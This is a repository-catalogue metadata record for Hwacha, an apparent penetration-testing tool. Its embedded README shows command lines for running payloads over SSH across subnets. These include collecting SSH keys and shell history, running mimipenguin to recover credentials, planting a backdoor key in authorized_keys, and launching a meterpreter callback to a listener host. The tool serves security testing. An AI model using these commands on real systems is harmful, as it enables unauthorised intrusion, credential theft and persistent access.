{"id":33057462,"url":"https://github.com/n00py/Hwacha","last_synced_at":"2025-11-14T08:01:39.030Z","repository":{"id":116211600,"uuid":"108943532","full_name":"n00py/Hwacha","owner":"n00py","description":"Deploy payloads to *Nix systems en masse ","archived":false,"fork":false,"pushed_at":"2020-04-24T22:03:34.000Z","size":721,"stargazers_count":107,"open_issues_count":1,"forks_count":29,"subscribers_count":5,"default_branch":"master","last_synced_at":"2025-10-11T08:14:26.111Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"https://www.n00py.io/2017/12/raining-shells-on-linux-environments-with-hwacha/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/n00py.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2017-10-31T04:04:09.000Z","updated_at":"2025-08-25T23:05:55.000Z","dependencies_parsed_at":null,"dependency_job_id":"ea4daccf-e15e-4ccd-a4b5-32ab365aa3ef","html_url":"https://github.com/n00py/Hwacha","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/n00py/Hwacha","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n00py%2FHwacha","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n00py%2FHwacha/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n00py%2FHwacha/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n00py%2FHwacha/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/n00py","download_url":"https://codeload.github.com/n00py/Hwacha/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n00py%2FHwacha/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":284360420,"owners_count":26991377,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-11-14T02:00:06.101Z","response_time":56,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2025-11-14T05:00:20.887Z","updated_at":"2025-11-14T08:01:39.025Z","avatar_url":"https://github.com/n00py.png","language":"Python","readme":"# Hwacha\n![alt tag](https://github.com/n00py/hwacha/blob/master/hwacha.png)\n\nhttps://www.n00py.io/2017/12/raining-shells-on-linux-environments-with-hwacha/\n\nHwacha is a tool to quickly execute payloads on *Nix based systems.  Easily collect artifacts or execute shellcode on an entire subnet of systems for which credentials are obtained. \n\n\n    $python hwacha.py \n        \u0026\u0026\u0026\u0026     \u0026\u0026         \u0026\u0026        \u0026\u0026\n    \u0026\u0026\u0026\u0026\u0026\u0026\u0026\u0026\u0026\u0026\u0026\u0026 \u0026\u0026         \u0026\u0026        \u0026\u0026      Created by Esteban Rodriguez   /~~\\_\n       \u0026\u0026\u0026\u0026\u0026\u0026    \u0026\u0026     \u0026\u0026\u0026\u0026\u0026\u0026\u0026\u0026\u0026\u0026    \u0026\u0026\t  Web: https://www.n00py.io     /| '` *\\\n      \u0026\u0026    \u0026\u0026   \u0026\u0026\u0026\u0026\u0026      \u0026\u0026        \u0026\u0026\u0026\u0026\u0026        Twitter: @n00py1         \\|  ___/\n     \u0026\u0026      \u0026\u0026  \u0026\u0026\u0026\u0026\u0026    \u0026\u0026  \u0026\u0026      \u0026\u0026\u0026\u0026\u0026   _   _                     _\n      \u0026\u0026    \u0026\u0026   \u0026\u0026      \u0026\u0026    \u0026\u0026     \u0026\u0026     | | | |                   | |\n       \u0026\u0026\u0026\u0026\u0026\u0026    \u0026\u0026    \u0026\u0026\u0026      \u0026\u0026\u0026   \u0026\u0026     | |_| |__      ____ _  ___| |__   __ _\n         \u0026\u0026      \u0026\u0026   \u0026\u0026          \u0026\u0026  \u0026\u0026     |  _  |\\ \\ /\\ / / _` |/ __| '_ \\ / _` |\n    \u0026\u0026\u0026\u0026\u0026\u0026\u0026\u0026\u0026\u0026\u0026\u0026\u0026\u0026\u0026                   \u0026\u0026     | | | | \\ V  V / (_| | (__| | | | (_| |\n                 \u0026\u0026                   \u0026\u0026     \\_| |_/  \\_/\\_/ \\__,_|\\___|_| |_|\\__,_| \n    To run commands, use -x [COMMAND]\n    to run modules, use -m [MODULE]\n    to specify module options, use -o [ARG=ARG ARG=ARG]\n    to see all available modules, use -L\n    Example usage:\n    python hwacha.py -t 192.168.1.1/24 -u admin  -p password\n    python hwacha.py -t 192.168.1.100-200 -u admin  -p password -m keys\n    python hwacha.py -t 192.168.1.100-200 -u admin  -i loot/keys/192.168.1.101/id_rsa -x id\n    python hwacha.py -t 192.168.1.123 -u admin  -p password -m meterpreter -o \"LPORT=4444 LHOST=192.168.1.150 TYPE=64\"\n\n\n    Available Modules:\n    [*] meterpreter               Use this to execute a meterpreter agent on the target(s).\n                                  REQURED ARGUMENTS: LHOST , LPORT\n                                  OPTIONAL ARGUMENTS: TYPE {python, php, 32, 64, osx}\n    [*] mimipenguin               Use this to execute a mimipenguin on the target(s) to recover credentials.  (Requires root)\n                                  OPTIONAL ARGUMENTS: LISTEN\n    [*] keys                      Use this to collect SSH private keys from the target(s).\n    [*] history                   Use this to collect shell history files from the target(s).\n    [*] privs                     Use this to enumerate sudo privileges on the targets(s).\n    [*] backdoor                  Creates an RSA key pair and adds public key to authorized_keys file on targets(s).\n    [*] web_delivery               Use this to execute a python script on the target(s).\n                                  REQURED ARGUMENTS: PATH\n                                  OPTIONAL ARGUMENTS: LISTEN\n    [*] custom_bin               Use this to execute a custom binary on the target(s).\n                                  REQURED ARGUMENTS: PATH\n    [*] sudo_exec               Use this to execute a custom binary (with sudo) on the target(s).\n                                  REQURED ARGUMENTS: PATH\n    [*] shellcode               Use this to execute custom shellcode on the target(s).\n                                  REQURED ARGUMENTS: PATH\n\n\nRequires paramiko:\n\n    pip install paramiko \n","funding_links":[],"categories":["GNU/Linux Utilities","Tools","Operating Systems"],"sub_categories":["Docker Containers of Penetration Testing Distributions and Tools","Zealandia","GNU/Linux Utilities","Linux"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fn00py%2FHwacha","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fn00py%2FHwacha","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fn00py%2FHwacha/lists"}